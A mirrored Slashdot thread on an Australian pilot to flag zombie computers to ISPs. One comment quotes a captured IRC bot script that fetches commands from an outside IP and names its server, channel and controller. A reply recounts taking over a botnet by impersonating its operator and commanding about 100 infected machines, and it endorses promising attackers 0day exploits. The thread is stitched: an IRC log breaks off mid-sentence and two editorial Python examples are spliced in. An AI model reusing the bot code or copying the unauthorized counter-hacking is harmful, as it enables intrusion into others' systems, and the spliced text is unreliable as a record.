Slashdot Mirror


AU Government To Pilot Target Zombies

msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"

9 of 159 comments

  1. dangerous by Anonymous Coward · · Score: 5, Interesting

    and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

    slippery slope!

  2. Echoing previous comments, I hope never by BigTimOBrien · · Score: 2, Interesting

    We should be able to find a technical solution to this without having to get the government involved in what amounts to censorship. I'm not saying we don't have a problem, but I am confident that the last thing we want is to have hundreds of additional employees at the FCC regulating traffic on the internet and sending nasty letters to people asking them to conform or be disconnected.

    Think about what would happen if the FCC were running around sending letters to people about computers that might be sending traffic they've deemed as disruptive? Couldn't the administrators at the FCC just use that as a pretext to monitor for P2P traffic? No thanks, Big Brother.

    --
    ------ Tim O'Brien
  3. Re:I got excited for a second by Capt+James+McCarthy · · Score: 2, Interesting

    They are actually called "Zombie Evildoers"

    --
    There are no loopholes. It's either legal or it's not.
  4. Why don't they target IRCops? by t0qer · · Score: 5, Interesting

    I'm a broke geek. I host my website on a machine in my house. Last few weeks I've caught my machine being used for zombie purposes. Attack vector was a vulnerability in phpnuke.

    Let me explain "why I use that holy piece of shit"

    The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (I'm thinking vbulletin) and I've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)

    So today the website freezes up again. Thanks to the fact that I'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up occasionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former Windows admins disappear to Redmond in the great Microsoft rapture of 2006.

    Ok.. SSH into the machine. Same as before, same exploit.

    poo:~# ls /tmp -al
    total 20
    drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
    drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
    drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
    drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
    drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

    Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and changed permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

    Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

    Finally I looked at bot.txt.

    # IRC
    my @adms=("bigfirex"); #nick dos administradores
    my @canais=("#testebot");
    use LWP::Simple;
    my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
    my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
    my $ircname = $dados;
    chop (my $realname = `uname -n`);
    $servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
    my $porta='6667'; #porta do servidor d irc

    Ahh here it got interesting. I now had an IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.

    I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"

    I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

    I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immediate action banning this guy from the network.

    I did a /who 0 and found an IRC op from IGS.ca. Below is a log of the chat I had with him.

    [msg(elsif)] hi are you an ircop?
    [elsif(jake@admin.igs.ca)] sure
    [msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
    [msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
    [elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
    [msg(elsif)] actually im just using a shell i have there, the ip for my compromised machine was banned from this network
    [elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
    [elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their
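    The useful part of the post above is that the dropped bot.txt told the admin where the bot phoned home. The following is an added example (not code from the thread or from any poster) of pulling those command-and-control indicators out of a captured Perl bot script so they can be blocked at the firewall and passed to the network's abuse contact. The sample script inside it mirrors the layout of the posted bot.txt, but every nick, channel, host and URL in it is a constructed placeholder.

```python
"""Extract IRC command-and-control indicators from a captured Perl bot script.

Added example: given the text of a bot config in the shape of the bot.txt
excerpt quoted in the thread, pull out the admin nicks, channels, IRC server,
port and any URLs it fetches. All values in SAMPLE_BOT are constructed
placeholders (documentation IP range / example.net), not real infrastructure.
"""
import re
from urllib.parse import urlparse

# Constructed sample with the same structure as the posted bot.txt.
SAMPLE_BOT = r"""
# IRC
my @adms=("admin-nick-1","admin-nick-2"); #nick dos administradores
my @canais=("#example-chan");
use LWP::Simple;
my $dados=get("http://192.0.2.10/fusao/nick/index.php");
my $nick=$dados;
my $ircname = $dados;
$servidor='irc.example.net' unless $servidor; #servidor d irc
my $porta='6667'; #porta do servidor d irc
"""

# Perl list assignment: my @name=("a","b");
LIST_RE = re.compile(r'@(\w+)\s*=\s*\((.*?)\)\s*;', re.S)
# Perl scalar assignment with a quoted literal, with or without "my", and
# tolerating a trailing "unless $var" clause as in the sample.
SCALAR_RE = re.compile(r"""\$(\w+)\s*=\s*['"]([^'"]*)['"]""")
URL_RE = re.compile(r'https?://[^\s"\')]+')
QUOTED_RE = re.compile(r"""['"]([^'"]*)['"]""")


def extract_indicators(script: str) -> dict:
    """Return the C2-related values found in a Perl bot script.

    Keys: admin_nicks, channels, server, port, urls. Missing values are
    an empty list or None so callers can test for them safely.
    """
    lists = {name: QUOTED_RE.findall(body) for name, body in LIST_RE.findall(script)}
    scalars = dict(SCALAR_RE.findall(script))
    port = scalars.get("porta", "")
    return {
        "admin_nicks": lists.get("adms", []),
        "channels": lists.get("canais", []),
        "server": scalars.get("servidor"),
        "port": int(port) if port.isdigit() else None,
        "urls": sorted(set(URL_RE.findall(script))),
    }


def c2_hosts(indicators: dict) -> list:
    """Hosts worth blocking outbound: the IRC server plus every URL host."""
    hosts = set()
    if indicators.get("server"):
        hosts.add(indicators["server"])
    for url in indicators.get("urls", []):
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_BOT)
    for key, value in found.items():
        print(f"{key}: {value}")
    print("block outbound to:", c2_hosts(found))
```

    The regexes deliberately key on the variable names used in this family of scripts (adms, canais, servidor, porta); a script that renames them still yields its URLs and quoted hostnames through the generic patterns, which is usually enough to identify the IRC network to contact.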

    1. Re:Why don't they target IRCops? by ivan+kk · · Score: 5, Interesting

      By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

      However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsible for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

      This actually happened to me once. One of my friend's machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
      I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be there, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
      Turns out it was a couple of Malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
      Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
      Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The Malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).

      Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
      Good luck with it.

  5. Re:Carrot and Stick is the key by KiloByte · · Score: 2, Interesting

    All it can do is disconnect it, and that just leads to support calls and whining from the (l)user. ... and to lusers leaving you like a leaky ship. They just _hate_ being educated.

    In many cases, you can block the relevant ports. 135, 137-139, 445, 5000 are among those that can be shut without any users even noticing. Blocking 25 would help, but you can't do that unless you're a monopoly. But, there is a trick out here -- count outgoing mails (-p tcp --dport 25 --tcp-flags SYN,ACK,FIN,RST SYN) and enact a block once they reach a certain threshold. At that point, if the user complains, you'll tell the user it's a virus what's breaking their e-mail.
    This won't be as nice on the rest of the network as we would wish (as the first 100 pieces of spam will get out), but it will provide the user with an incentive to clean up their box. And, if the user uses webmail, they will sleep with their worm silently, without any headaches for you.

    And generally, any outage will be blamed on you, not the worms.

    --
    The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
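    The counting trick in the comment above (match only the initial SYN of outbound connections to TCP/25, then block a host once it passes a threshold) is easy to get wrong if ACKs and retransmits are counted too. The following is an added example, not code from the poster, that does the counting side over iptables-style kernel LOG lines and applies the same flag test as the quoted match. The log lines, the "SMTP-OUT" log prefix, the addresses and the threshold are all constructed for this example.

```python
"""Count new outbound SMTP connections per customer host and flag offenders.

Added example: the iptables match "-p tcp --dport 25 --tcp-flags
SYN,ACK,FIN,RST SYN" only sees the first packet of a connection (SYN set,
ACK/FIN/RST clear). This script applies the same test to LOG lines and
reports hosts whose count reaches a threshold. Everything in SAMPLE_LOG is
constructed: the "SMTP-OUT" prefix is an assumed --log-prefix and the
addresses come from private/documentation ranges.
"""
import re
from collections import Counter

# Constructed sample of kernel log lines in the shape an iptables LOG target
# produces. The ACK-only line and the DPT=80 line are there to be ignored.
SAMPLE_LOG = """\
Nov  6 14:55:01 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 PROTO=TCP SPT=51234 DPT=25 WINDOW=5840 SYN URGP=0
Nov  6 14:55:01 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.11 PROTO=TCP SPT=51235 DPT=25 WINDOW=5840 SYN URGP=0
Nov  6 14:55:02 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.12 PROTO=TCP SPT=51236 DPT=25 WINDOW=5840 SYN URGP=0
Nov  6 14:55:02 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.5 DST=203.0.113.13 PROTO=TCP SPT=51237 DPT=25 WINDOW=5840 SYN URGP=0
Nov  6 14:55:03 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.9 DST=203.0.113.20 PROTO=TCP SPT=40001 DPT=25 WINDOW=5840 SYN URGP=0
Nov  6 14:55:04 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.9 DST=203.0.113.20 PROTO=TCP SPT=40001 DPT=25 WINDOW=5840 ACK URGP=0
Nov  6 14:55:05 gw kernel: SMTP-OUT IN=eth1 OUT=eth0 SRC=10.0.0.7 DST=203.0.113.30 PROTO=TCP SPT=40002 DPT=80 WINDOW=5840 SYN URGP=0
"""

LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) SPT=\d+ DPT=(?P<dpt>\d+)"
)
# Only the flags the iptables mask looks at; PSH/URG are irrelevant to the test.
FLAG_RE = re.compile(r"\b(SYN|ACK|FIN|RST)\b")


def new_smtp_connection_src(line: str):
    """Return the source IP if this line is the opening SYN of a TCP/25
    connection, otherwise None. Mirrors --tcp-flags SYN,ACK,FIN,RST SYN."""
    m = LINE_RE.search(line)
    if not m or m["proto"] != "TCP" or m["dpt"] != "25":
        return None
    if set(FLAG_RE.findall(line)) != {"SYN"}:
        return None
    return m["src"]


def count_smtp_syns(log_text: str) -> Counter:
    """Number of new outbound SMTP connections per source host."""
    counts = Counter()
    for line in log_text.splitlines():
        src = new_smtp_connection_src(line)
        if src:
            counts[src] += 1
    return counts


def hosts_over_threshold(log_text: str, threshold: int) -> list:
    """Hosts that have opened at least `threshold` SMTP connections."""
    return sorted(src for src, n in count_smtp_syns(log_text).items() if n >= threshold)


def block_rule(src: str) -> str:
    """The iptables command that would enact the block for one host.
    Returned as a string so a human (or a cron job) decides whether to run it."""
    return f"iptables -I FORWARD -s {src} -p tcp --dport 25 -j REJECT"


if __name__ == "__main__":
    for src, n in count_smtp_syns(SAMPLE_LOG).items():
        print(f"{src}: {n} new SMTP connections")
    for src in hosts_over_threshold(SAMPLE_LOG, 3):
        print("would run:", block_rule(src))
```

    In the sample, 10.0.0.5 opens four connections and trips a threshold of 3, 10.0.0.9 counts once because its ACK line is not a connection start, and 10.0.0.7 is never counted because it talks to port 80. In production the count should be windowed over time (the comment's point is a rate, not a lifetime total) and the threshold set from the normal outbound mail volume on that network.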
  6. Re:When will people learn? by Anonymous Coward · · Score: 1, Interesting

    I've been meaning to write an anti-spyware Internet Exploder patch for a long time now:
     
    It would patch the "You are about to install..." dialog, so instead of saying "Yes" and "No", the buttons would say, "No" and "FUCK No!"

  7. No, it's actually happening. by ScentCone · · Score: 1, Interesting

    We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!

    How do you say "evil zombies" in French? "Malfaiteurs de Zombi?" I bet some people are wondering that right now (since they can't get to work this morning, what with their cars having been torched by nocturnal zombie throngs). Le *sigh*.

    --
    Don't disappoint your bird dog. Go to the range.
  8. Re:No regulation for me. by Pig+Hogger · · Score: 2, Interesting
    Most libertarians want as much social AND economic freedom as they can get.
    So they can make money at the expense of others (social freedom = freedom to enslave others).
    Most of the rest of the country doesn't realize that Liberty and Security are polar opposites.
    An Anglo-Saxon fallacy!

    Security is the absolute prerequisite for enjoying one's freedom. If one has to enforce his own freedom, he is so overwhelmed by the task that he has no time/resources to enjoy his "freedom".

    One's freedom **SHALL NEVER** infringe on someone else's freedom.

    Some Americans, by virtue of their money, are more free than others, and the former often have no problem infringing on the freedom of the latter.